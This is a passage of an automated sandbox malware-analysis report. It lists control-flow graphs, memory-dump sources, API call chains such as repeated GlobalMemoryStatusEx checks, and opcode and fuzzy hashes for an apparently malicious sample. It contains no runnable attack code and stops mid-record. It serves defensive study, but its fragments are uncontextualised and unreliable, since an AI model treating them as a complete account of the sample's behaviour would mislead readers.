                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc
                                                                                                              • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                              • API String ID: 2803490479-2443507578
                                                                                                              • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                              • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                              • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                              • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                              • String ID: D`4wD`4w$D`4wD`4w
                                                                                                              • API String ID: 4108700736-3394693991
                                                                                                              • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                              • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                              • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                              • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:12.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:148
                                                                                                              Total number of Limit Nodes:23
                                                                                                              execution_graph 25202 1160b4d 25203 1160b55 25202->25203 25204 116084e 25202->25204 25205 116091b 25204->25205 25208 1161487 25204->25208 25216 116137f 25204->25216 25210 1161396 25208->25210 25211 1161493 25208->25211 25209 1161484 25209->25204 25210->25209 25215 1161487 2 API calls 25210->25215 25223 1167d90 25210->25223 25230 1167d80 25210->25230 25237 1167ea8 25210->25237 25211->25204 25215->25210 25217 1161383 25216->25217 25218 116133b 25216->25218 25217->25218 25219 1167d90 2 API calls 25217->25219 25220 1167d80 2 API calls 25217->25220 25221 1167ea8 2 API calls 25217->25221 25222 1161487 2 API calls 25217->25222 25218->25204 25219->25217 25220->25217 25221->25217 25222->25217 25224 1167da6 25223->25224 25226 1167e57 25224->25226 25245 1168718 25224->25245 25225 1167f12 25225->25210 25226->25225 25251 116f7bf 25226->25251 25256 116f612 25226->25256 25232 1167d90 25230->25232 25231 1167f12 25231->25210 25233 1167e57 25232->25233 25234 1168718 2 API calls 25232->25234 25233->25231 25235 116f612 2 API calls 25233->25235 25236 116f7bf 2 API calls 25233->25236 25234->25232 25235->25231 25236->25231 25238 1167eb2 25237->25238 25240 1167ecc 25238->25240 25243 692fb58 2 API calls 25238->25243 25244 692fb68 2 API calls 25238->25244 25239 1167f12 25239->25210 25240->25239 25241 116f612 2 API calls 25240->25241 25242 116f7bf 2 API calls 25240->25242 25241->25239 25242->25239 25243->25240 25244->25240 25246 116871d 25245->25246 25247 1168f2d 25246->25247 25261 116a04b 25246->25261 25266 1169fa8 25246->25266 25271 1169f98 25246->25271 25247->25224 25252 116f7ca 25251->25252 25329 692fb58 25252->25329 25334 692fb68 25252->25334 25253 116f7d1 25253->25225 25257 116f639 25256->25257 25258 116f6af 25257->25258 25339 116f850 25257->25339 25345 116f840 25257->25345 25262 116a020 25261->25262 25263 116a061 25262->25263 25276 116a098 25262->25276 25282 116a0a8 25262->25282 25268 1169fc5 25266->25268 25267 116a061 25268->25267 25269 116a098 2 API calls 25268->25269 25270 116a0a8 2 API calls 25268->25270 25269->25268 25270->25268 25273 1169fa8 25271->25273 25272 116a061 25273->25272 25274 116a098 2 API calls 25273->25274 25275 116a0a8 2 API calls 25273->25275 25274->25273 25275->25273 25277 116a0a8 25276->25277 25278 116a182 25277->25278 25288 116a1b2 25277->25288 25295 116a4d6 25277->25295 25302 116a2d8 25277->25302 25283 116a0c2 25282->25283 25284 116a182 25283->25284 25285 116a4d6 2 API calls 25283->25285 25286 116a1b2 2 API calls 25283->25286 25287 116a2d8 2 API calls 25283->25287 25285->25283 25286->25283 25287->25283 25290 116a1e1 25288->25290 25289 116a505 25289->25277 25290->25289 25292 116a4d6 2 API calls 25290->25292 25293 116a1b2 2 API calls 25290->25293 25294 116a2d8 2 API calls 25290->25294 25309 116df00 25290->25309 25292->25290 25293->25290 25294->25290 25297 116a1e1 25295->25297 25296 116a505 25296->25277 25297->25296 25298 116df00 2 API calls 25297->25298 25299 116a4d6 2 API calls 25297->25299 25300 116a1b2 2 API calls 25297->25300 25301 116a2d8 2 API calls 25297->25301 25298->25297 25299->25297 25300->25297 25301->25297 25304 116a1e1 25302->25304 25303 116a505 25303->25277 25304->25303 25305 116a4d6 2 API calls 25304->25305 25306 116a1b2 2 API calls 25304->25306 25307 116a2d8 2 API calls 25304->25307 25308 116df00 2 API calls 25304->25308 25305->25304 25306->25304 25307->25304 25308->25304 25312 116df1a 25309->25312 25310 116df6b 25310->25290 25312->25310 25314 116eed0 25312->25314 25317 116ef08 25314->25317 25315 116e37e 25315->25290 25318 116ef25 25317->25318 25319 116ef4d 25317->25319 25318->25315 25325 116ef08 GlobalMemoryStatusEx 25319->25325 25326 116eff0 25319->25326 25320 116ef6e 25320->25315 25321 116ef6a 25321->25320 25322 116f036 GlobalMemoryStatusEx 25321->25322 25323 116f066 25322->25323 25323->25315 25325->25321 25327 116f036 GlobalMemoryStatusEx 25326->25327 25328 116f066 25327->25328 25328->25321 25331 692fb7d 25329->25331 25330 692fd92 25330->25253 25331->25330 25332 116df00 GlobalMemoryStatusEx GlobalMemoryStatusEx 25331->25332 25333 116e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25331->25333 25332->25331 25333->25331 25336 692fb7d 25334->25336 25335 692fd92 25335->25253 25336->25335 25337 116df00 GlobalMemoryStatusEx GlobalMemoryStatusEx 25336->25337 25338 116e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25336->25338 25337->25336 25338->25336 25341 116f855 25339->25341 25340 116f883 25340->25257 25341->25340 25351 116f890 25341->25351 25358 116fa87 25341->25358 25365 116fb06 25341->25365 25346 116f850 25345->25346 25347 116f883 25346->25347 25348 116fb06 2 API calls 25346->25348 25349 116fa87 2 API calls 25346->25349 25350 116f890 2 API calls 25346->25350 25347->25257 25348->25346 25349->25346 25350->25346 25353 116f8b7 25351->25353 25352 116fb32 25353->25352 25354 116fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 25353->25354 25356 116fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 25353->25356 25372 116ff9c 25353->25372 25376 116fd19 25353->25376 25354->25353 25356->25353 25360 116f916 25358->25360 25359 116fb32 25360->25359 25361 116fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 25360->25361 25362 116ff9c 2 API calls 25360->25362 25363 116fd19 2 API calls 25360->25363 25364 116fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 25360->25364 25361->25360 25362->25360 25363->25360 25364->25360 25367 116f916 25365->25367 25366 116fb32 25367->25366 25368 116fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 25367->25368 25369 116ff9c 2 API calls 25367->25369 25370 116fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 25367->25370 25371 116fd19 2 API calls 25367->25371 25368->25367 25369->25367 25370->25367 25371->25367 25373 116fd47 25372->25373 25374 116df00 2 API calls 25373->25374 25375 116fd8a 25373->25375 25374->25373 25375->25353 25379 116fd47 25376->25379 25377 116df00 2 API calls 25377->25379 25378 116fd8a 25378->25353 25379->25377 25379->25378

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 931 6927e78-6927e96 932 6927e98-6927e9b 931->932 933 6927eb2-6927eb5 932->933 934 6927e9d-6927eab 932->934 935 6927ec2-6927ec5 933->935 936 6927eb7-6927ec1 933->936 940 6927f1e-6927f34 934->940 941 6927ead 934->941 937 6927ec7-6927ee3 935->937 938 6927ee8-6927eeb 935->938 937->938 942 6927f0c-6927f0e 938->942 943 6927eed-6927f07 938->943 949 6927f3a-6927f43 940->949 950 692814f-6928159 940->950 941->933 944 6927f10 942->944 945 6927f15-6927f18 942->945 943->942 944->945 945->932 945->940 952 692815a-692818f 949->952 953 6927f49-6927f66 949->953 957 6928191-6928194 952->957 961 692813c-6928149 953->961 962 6927f6c-6927f94 953->962 959 692819a-69281a9 957->959 960 69283c9-69283cc 957->960 968 69281ab-69281c6 959->968 969 69281c8-692820c 959->969 963 69283ce-69283ea 960->963 964 69283ef-69283f2 960->964 961->949 961->950 962->961 982 6927f9a-6927fa3 962->982 963->964 966 69283f8-6928404 964->966 967 692849d-692849f 964->967 974 692840f-6928411 966->974 970 69284a1 967->970 971 69284a6-69284a9 967->971 968->969 987 6928212-6928223 969->987 988 692839d-69283b3 969->988 970->971 971->957 975 69284af-69284b8 971->975 977 6928413-6928419 974->977 978 6928429-692842d 974->978 983 692841b 977->983 984 692841d-692841f 977->984 985 692843b 978->985 986 692842f-6928439 978->986 982->952 989 6927fa9-6927fc5 982->989 983->978 984->978 992 6928440-6928442 985->992 986->992 998 6928388-6928397 987->998 999 6928229-6928246 987->999 988->960 1001 692812a-6928136 989->1001 1002 6927fcb-6927ff5 989->1002 993 6928453-692848c 992->993 994 6928444-6928447 992->994 993->959 1014 6928492-692849c 993->1014 994->975 998->987 998->988 999->998 1008 692824c-6928342 call 6926698 999->1008 1001->961 1001->982 1015 6928120-6928125 1002->1015 1016 6927ffb-6928023 1002->1016 1064 6928350 1008->1064 1065 6928344-692834e 1008->1065 1015->1001 1016->1015 1022 6928029-6928057 1016->1022 1022->1015 1028 692805d-6928066 1022->1028 1028->1015 1029 692806c-692809e 1028->1029 1037 69280a0-69280a4 1029->1037 1038 69280a9-69280c5 1029->1038 1037->1015 1041 69280a6 1037->1041 1038->1001 1039 69280c7-692811e call 6926698 1038->1039 1039->1001 1041->1038 1066 6928355-6928357 1064->1066 1065->1066 1066->998 1067 6928359-692835e 1066->1067 1068 6928360-692836a 1067->1068 1069 692836c 1067->1069 1070 6928371-6928373 1068->1070 1069->1070 1070->998 1071 6928375-6928381 1070->1071 1071->998
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 34387718ea08cf2734f5303d4515fc7efcf29dc16b439bf56d82dc9086bad3b5
                                                                                                              • Instruction ID: c21dafbec4bd236354f31c4a15d0906aaf77214b16b53204cc27eed3f84e0fc2
                                                                                                              • Opcode Fuzzy Hash: 34387718ea08cf2734f5303d4515fc7efcf29dc16b439bf56d82dc9086bad3b5
                                                                                                              • Instruction Fuzzy Hash: D0029C30B002268FDB54DB68D950BAEB7F6FF84304F248929D4159B799DB71EC86CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5c2308b3deac3f25d7d8d92bb38ec681d7ae5f3d64dd9dbb0c2f7ecd095dfd4
                                                                                                              • Instruction ID: 207a7e0008cce8e781ec58ea7a8bcf324e9526d31ce955902ca8df04b9209195
                                                                                                              • Opcode Fuzzy Hash: b5c2308b3deac3f25d7d8d92bb38ec681d7ae5f3d64dd9dbb0c2f7ecd095dfd4
                                                                                                              • Instruction Fuzzy Hash: 43A26434A002158FDBA4CF68C584B9DB7F6EB49314F6884A9D409DB769DB34EE85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89af4ade80311df2fffb30fe18951702411e86dac51e1e7598e2cb3e0b5edfac
                                                                                                              • Instruction ID: 8b8d2311e1a5ae8a1f97d998dea61c56386d94a5e1f7d92e79cb9fd1d887bb65
                                                                                                              • Opcode Fuzzy Hash: 89af4ade80311df2fffb30fe18951702411e86dac51e1e7598e2cb3e0b5edfac
                                                                                                              • Instruction Fuzzy Hash: 0662BD30A002269FDB54DB68D590BADB7F6FF88314F248469E406EBB58DB35EC45CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 81ef29d7ba8b8f14c63da90113eff600738e1bc449e3bd203cbd15fe91184f0e
                                                                                                              • Instruction ID: a551f1a4dd7bd6499ae89418d9c4100a6ff766fdef6edf6b9c1a2ea957b9bb76
                                                                                                              • Opcode Fuzzy Hash: 81ef29d7ba8b8f14c63da90113eff600738e1bc449e3bd203cbd15fe91184f0e
                                                                                                              • Instruction Fuzzy Hash: 7032C130B0021ADFDB94DB68D890BAEB7B6FB88314F208529D445E7759DB31EC42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60f902e5e3ce9934fa9b85b03a0252148a09c43234cd1a51f4b848b357fdec17
                                                                                                              • Instruction ID: ddbef1cdfb22c21fce9cf62d718c3f9b66c4b98aa27e14695d61dc6c3548f6e9
                                                                                                              • Opcode Fuzzy Hash: 60f902e5e3ce9934fa9b85b03a0252148a09c43234cd1a51f4b848b357fdec17
                                                                                                              • Instruction Fuzzy Hash: AA12E775F002269FDF64DB68D8847AEBBBAEF84310F25842AD415DB748DA74EC41CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f21d7bd8abb352fdadf28a386d838fd0732ad994acfa9d66e6a5ab9e7c0b2d90
                                                                                                              • Instruction ID: 374fe00058f3b14e107569358a0cf65f9cfe02525a2bb0df5290373f14196905
                                                                                                              • Opcode Fuzzy Hash: f21d7bd8abb352fdadf28a386d838fd0732ad994acfa9d66e6a5ab9e7c0b2d90
                                                                                                              • Instruction Fuzzy Hash: 08227D70E0021A8BEF64DB68D480BADB7F5FB49318F248926E455DBB8DCA34DC81CB51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 427 6929250-6929275 428 6929277-692927a 427->428 429 6929280-6929295 428->429 430 6929b38-6929b3b 428->430 436 6929297-692929d 429->436 437 69292ad-69292c3 429->437 431 6929b61-6929b63 430->431 432 6929b3d-6929b5c 430->432 434 6929b65 431->434 435 6929b6a-6929b6d 431->435 432->431 434->435 435->428 439 6929b73-6929b7d 435->439 440 69292a1-69292a3 436->440 441 692929f 436->441 444 69292ce-69292d0 437->444 440->437 441->437 445 69292d2-69292d8 444->445 446 69292e8-6929359 444->446 447 69292da 445->447 448 69292dc-69292de 445->448 457 6929385-69293a1 446->457 458 692935b-692937e 446->458 447->446 448->446 463 69293a3-69293c6 457->463 464 69293cd-69293e8 457->464 458->457 463->464 469 6929413-692942e 464->469 470 69293ea-692940c 464->470 475 6929453-6929461 469->475 476 6929430-692944c 469->476 470->469 477 6929463-692946c 475->477 478 6929471-69294eb 475->478 476->475 477->439 484 6929538-692954d 478->484 485 69294ed-692950b 478->485 484->430 489 6929527-6929536 485->489 490 692950d-692951c 485->490 489->484 489->485 490->489
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: 06be55f83e13701d243f71fd979e913bc57082b5c0907afd916b2d186a3c7757
                                                                                                              • Instruction ID: 01462443a4a5f7a313a92bce6e33f9e13269009fd3767dfb3ba238ce1e1d099f
                                                                                                              • Opcode Fuzzy Hash: 06be55f83e13701d243f71fd979e913bc57082b5c0907afd916b2d186a3c7757
                                                                                                              • Instruction Fuzzy Hash: DB91B271B4021A8FDB64DB69D890BAE77F6FF88304F108569C809EB758EE70DD418B90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1269 6929241-6929275 1271 6929277-692927a 1269->1271 1272 6929280-6929295 1271->1272 1273 6929b38-6929b3b 1271->1273 1279 6929297-692929d 1272->1279 1280 69292ad-69292c3 1272->1280 1274 6929b61-6929b63 1273->1274 1275 6929b3d-6929b5c 1273->1275 1277 6929b65 1274->1277 1278 6929b6a-6929b6d 1274->1278 1275->1274 1277->1278 1278->1271 1282 6929b73-6929b7d 1278->1282 1283 69292a1-69292a3 1279->1283 1284 692929f 1279->1284 1287 69292ce-69292d0 1280->1287 1283->1280 1284->1280 1288 69292d2-69292d8 1287->1288 1289 69292e8-6929359 1287->1289 1290 69292da 1288->1290 1291 69292dc-69292de 1288->1291 1300 6929385-69293a1 1289->1300 1301 692935b-692937e 1289->1301 1290->1289 1291->1289 1306 69293a3-69293c6 1300->1306 1307 69293cd-69293e8 1300->1307 1301->1300 1306->1307 1312 6929413-692942e 1307->1312 1313 69293ea-692940c 1307->1313 1318 6929453-6929461 1312->1318 1319 6929430-692944c 1312->1319 1313->1312 1320 6929463-692946c 1318->1320 1321 6929471-69294eb 1318->1321 1319->1318 1320->1282 1327 6929538-692954d 1321->1327 1328 69294ed-692950b 1321->1328 1327->1273 1332 6929527-6929536 1328->1332 1333 692950d-692951c 1328->1333 1332->1327 1332->1328 1333->1332
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 321f329898a2d41525c019543a85757ba1bf0beac1d5966d35af7adcbd7f86ef
                                                                                                              • Instruction ID: 9780c51b5e31715107d839531514ffe07d654df8e03bd4fd720b6fbfd02aed12
                                                                                                              • Opcode Fuzzy Hash: 321f329898a2d41525c019543a85757ba1bf0beac1d5966d35af7adcbd7f86ef
                                                                                                              • Instruction Fuzzy Hash: CA514E71B402199FDB54DB79D8A0BAE77F6BF88304F148569C809DB758EA70DC028B91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1382 116ef08-116ef23 1383 116ef25-116ef4c 1382->1383 1384 116ef4d-116ef63 1382->1384 1405 116ef65 call 116eff0 1384->1405 1406 116ef65 call 116ef08 1384->1406 1387 116ef6a-116ef6c 1388 116ef72-116efd1 1387->1388 1389 116ef6e-116ef71 1387->1389 1396 116efd7-116f064 GlobalMemoryStatusEx 1388->1396 1397 116efd3-116efd6 1388->1397 1401 116f066-116f06c 1396->1401 1402 116f06d-116f095 1396->1402 1401->1402 1405->1387 1406->1387
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3788249290.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_1160000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 02a1fc79bd96ef71094207fdfe477dca362d34d11fbf158bd9fce11ad4c815ef
                                                                                                              • Instruction ID: a070bc6722e709df0d767b4055204ac695dcee66a6fbb4fa288cb9c71014bead
                                                                                                              • Opcode Fuzzy Hash: 02a1fc79bd96ef71094207fdfe477dca362d34d11fbf158bd9fce11ad4c815ef
                                                                                                              • Instruction Fuzzy Hash: 61412072D0035A9FDB14DF69D8002EEBBF5EF89310F18866AD944A7241EB749845CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1407 116eff0-116f064 GlobalMemoryStatusEx 1409 116f066-116f06c 1407->1409 1410 116f06d-116f095 1407->1410 1409->1410
                                                                                                              APIs
                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0116F057
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3788249290.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_1160000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 1890195054-0
                                                                                                              • Opcode ID: c6b13f0e68fa3f6791061e7ab52cd9f03651e61395ef6a923cf93f990c9af81f
                                                                                                              • Instruction ID: acc30373a4a3df6f99262ddd5f729e13d40c396bf3065e2fd4d10bf8dd33f088
                                                                                                              • Opcode Fuzzy Hash: c6b13f0e68fa3f6791061e7ab52cd9f03651e61395ef6a923cf93f990c9af81f
                                                                                                              • Instruction Fuzzy Hash: DC1123B1C0026A9BDB24CF9AD544BDEFBF5EF48320F14812AD818B7240D378A945CFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PHq
                                                                                                              • API String ID: 0-3820536768
                                                                                                              • Opcode ID: d08562d911370929b06cd92a5f0ce0961a73d7dc0a53f3ce13178ee680709c9d
                                                                                                              • Instruction ID: 3ddd1e7fd3c7343c4573e7d75cae1f1338a5e93ba5647e258bb850c3add79696
                                                                                                              • Opcode Fuzzy Hash: d08562d911370929b06cd92a5f0ce0961a73d7dc0a53f3ce13178ee680709c9d
                                                                                                              • Instruction Fuzzy Hash: A741C070E0075A9FDF50DF65D8847AEBBB6FF86700F20452AD412EB644DBB19849CB81
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: d254470133e21af41099bad18c287bdfe7a80dc7a98ebb7479ed0ffa2c119b1a
                                                                                                              • Instruction ID: 5cb11a81ccd884ec67484be3c6fc2c54047cdfba6f1b494c05b21a7ae9093909
                                                                                                              • Opcode Fuzzy Hash: d254470133e21af41099bad18c287bdfe7a80dc7a98ebb7479ed0ffa2c119b1a
                                                                                                              • Instruction Fuzzy Hash: 9FF0DC31A042229BDF649A49FB8176873ACEB40319F248866D904CBA4DC661EE09CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77beeb3e1cf4419f009bd1b0a54823f2efe9d84372fdb22da473b92119c19d32
                                                                                                              • Instruction ID: 65d39a91ef8892bf237cda162f7b12835f87a8fee04d40a319343b54c09ec794
                                                                                                              • Opcode Fuzzy Hash: 77beeb3e1cf4419f009bd1b0a54823f2efe9d84372fdb22da473b92119c19d32
                                                                                                              • Instruction Fuzzy Hash: 9761F671F001214FDF549A7DC84069EBAEBAFC5210B294439D40AEB768DEB5ED0287D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1c4277c4ec09673bc98a936466f8e9668f080bb6568af128b405b6bb039e2df
                                                                                                              • Instruction ID: a88e9d7126da875bd1bee69fa25c06f4292f7c5b34bb71238792b39c5a3229ca
                                                                                                              • Opcode Fuzzy Hash: c1c4277c4ec09673bc98a936466f8e9668f080bb6568af128b405b6bb039e2df
                                                                                                              • Instruction Fuzzy Hash: 22816F70B006198FDB54DF68D590BAEBBF7EF89700F208529D40AEB758DA74DC428B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c42328b0d626a7540a7b4b0913c8c0085f5fc4fa45df4b346acc21304616b8b
                                                                                                              • Instruction ID: 17df4606c9928ec15665e028a4e392072e87c6ba14fb3a5ab5d07a6c500ccc60
                                                                                                              • Opcode Fuzzy Hash: 8c42328b0d626a7540a7b4b0913c8c0085f5fc4fa45df4b346acc21304616b8b
                                                                                                              • Instruction Fuzzy Hash: 3E914E34E1021A8FDF60DF68C850BDDB7B5FF89300F208699D549AB255DB70AA85CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd19e0a34ce5b0593197988615891add1cf1b273aa20eed37849d7129376b36a
